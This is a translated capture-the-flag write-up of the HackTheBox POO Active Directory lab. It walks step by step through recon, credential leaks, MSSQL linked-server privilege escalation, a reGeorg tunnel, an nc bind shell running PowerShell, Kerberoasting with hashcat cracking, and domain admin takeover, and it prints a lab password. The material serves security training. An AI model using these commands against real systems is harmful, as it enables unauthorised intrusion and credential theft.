In this article, we will analyze the passage of not just a machine, but an entire mini-laboratory from the site .
As stated in the description, POO is designed to test skills at all stages of attacks in a small Active Directory environment. The goal is to compromise an available host, escalate privileges, and eventually compromise the entire domain by collecting 5 flags in the process.
The connection to the laboratory is via VPN. It is recommended not to connect from a working computer or from a host where there is important data for you, as you get into a private network with people who know something about information security 🙂
organizational information
So that you can find out about new articles, software and other information, I created и in the area of IIKB. Also your personal requests, questions, suggestions and recommendations .
All information is provided for educational purposes only. The author of this document assumes no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained as a result of studying this document.
Intro
This endgame consists of two machines and contains 5 flags.
The description and address of the available host is also given.
Let's start!
Recon flag
This machine has an IP address of 10.13.38.11 which I add to /etc/hosts.
10.13.38.11 poo.htb
The first step is to scan open ports. Since it takes a long time to scan all ports with nmap, I will first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detailed information about the services that run on the ports, let's run a scan with the -A option.
nmap -A poo.htb -p80,1433
Thus, we have IIS and MSSQL services. In this case, we will find out the real DNS name of the domain and computer. On the web server, we are greeted by the IIS home page.
Let's iterate over the directories. I use gobuster for this. In the parameters we specify the number of streams 128 (-t), URL (-u), dictionary (-w) and extensions that interest us (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Thus, we have HTTP authentication for the /admin directory, as well as the .DS_Store desktop service storage file available. .DS_Store are files that store user settings for a folder, such as a list of files, icon location, selected background image. Such a file may end up in the web server directory of web developers. Thus, we get information about the contents of the directory. For this you can use .
python3 dsstore_crawler.py -i http://poo.htb/
We get the contents of the directory. The most interesting thing here is the /dev directory, from which we can see the sources and db files in two branches. But we can use the first 6 characters of file and directory names if the service is vulnerable to IIS ShortName. You can check for this vulnerability using .
And we find one text file that starts with "poo_co". Not knowing what to do next, I simply selected from the dictionary of directories all the words that begin with "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txtAnd iterate with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And find the right word! We look at this file, save the credentials (judging by the DBNAME parameter, they are from MSSQL).
We hand over the flag, and we advance by 20%.
Huh flag
We connect to MSSQL, I use DBeaver.
We do not find anything interesting in this database, let's create an SQL Editor and check what users are.
SELECT name FROM master..syslogins;
We have two users. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Thus, there are no privileges. Let's see the linked servers, I wrote about this technique in detail .
SELECT * FROM master..sysservers;
So we find another SQL Server. Let's check the execution of commands on this server using openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
And we can even build a query tree.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');The fact is that when we make a request to a linked server, the request is executed in the context of another user! Let's see what user context we are running on the linked server.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
And now let's see in what context the request from the linked server to ours is executed!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Thus, it is a DBO context that must have all privileges. Let's check the privileges in case of a request from a linked server.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have all the privileges! Let's create our admin like this. But they don't let them through openquery, let's do it through EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";And now we connect with the credentials of the new user, observe the new flag database.
We hand over this flag and go further.
Backtrack flag
Let's get the shell using MSSQL, I'm using mssqlclient from the impacket package.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
We need to get passwords, and the first thing we have already met is the site. Thus, we need a web server config (we can’t throw a convenient shell, apparently the firewall is working).
But access is denied. Although we can read the file from MSSQL, we just need to know what programming languages are configured. And in the MSSQL directory we find out that there is Python.
Then there is no problem to read the web.config file.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
With the credentials found, go to /admin and pick up the flag.
foothold flag
In fact, there are some inconveniences from using a firewall, but looking through the network settings, we notice that IPv6 protocol is also used!
Add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but this time over IPv6.
And the WinRM service is available over IPv6. Let's connect with the found credentials.
There is a flag on the desktop, hand over it.
P00ned flag
After reconnaissance on the host with we don't find anything special. Then it was decided to look for credentials again (I also wrote on this topic ). But I couldn't get all the SPNs from the system via WinRM.
setspn.exe -T intranet.poo -Q */*
Let's execute the command via MSSQL.
In this way, we get the SPN of users p00_hr and p00_adm, which means that they are vulnerable to an attack such as Kerberoasting. In short, we can get the hashes of their passwords.
First you need to get a stable shell on behalf of the MSSQL user. But since we are limited in access, we have a connection with the host only through ports 80 and 1433. But it is possible to tunnel traffic through port 80! For this we use . Let's upload the tunnel.aspx file to the home directory of the web server - C: inetpubwwwroot.
But when we try to access it, we get a 404 error. This means that *.aspx files are not executed. To make files with these extensions run, install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when accessing tunnel.aspx, we get the answer that everything is ready to go.
Let's start the client part of the application, which will relay traffic. We will forward all traffic from port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to send the traffic of any application through our proxy. Let's add this proxy to the /etc/proxychains.conf configuration file.
Now let's upload the program to the server , with which we will make a stable bind shell, and the script , with which we will perform the Kerberoasting attack.
Now, through MSSQL, we launch the listener.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
And we connect through our proxy.
proxychains rlwrap nc poo.htb 4321
And let's get the hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Next, you need to iterate over these hashes. Since rockyou did not have a password data dictionary, I used ALL the passwords dictionaries provided in Seclists. For enumeration we use hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --forceAnd we find both passwords, the first in the dutch_passwordlist.txt dictionary, and the second in Keyboard-Combinations.txt.
And so we have three users, we go to the domain controller. Let's find out his address first.
Great, we have learned the IP address of the domain controller. Let's find out all users of the domain, as well as which of them is an administrator. To download the script to get information PowerView.ps1. Then we will connect using evil-winrm, specifying the directory with the script in the -s parameter. And then just load the PowerView script.
Now we have access to all its functions. The p00_adm user looks like a privileged user, so we will work in its context. Let's create a PSCredential object for this user.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$CpassNow all Powershell commands where we specify Creds will be executed on behalf of p00_adm. Let's display a list of users and the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
And so, our user is really privileged. Let's see what groups he belongs to.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
We finally confirm that the user is a domain administrator. This gives it the right to remotely log on to the domain controller. Let's try to login with WinRM using our tunnel. I was confused by the errors issued by reGeorg when using evil-winrm.
Then we use another, easier one, to connect to WinRM. Open and change connection parameters.
We try to connect, and we are in the system.
But there is no flag. Then look at the user and check the desktops.
At mr3ks we find the flag and the laboratory is 100% completed.
That's all. As feedback, comment on whether you learned something new from this article and whether it was useful to you.
You can join us at . There you can find interesting materials, merged courses, as well as software. Let's gather a community in which there will be people who understand many areas of IT, then we can always help each other on any IT and information security issues.
Source: habr.com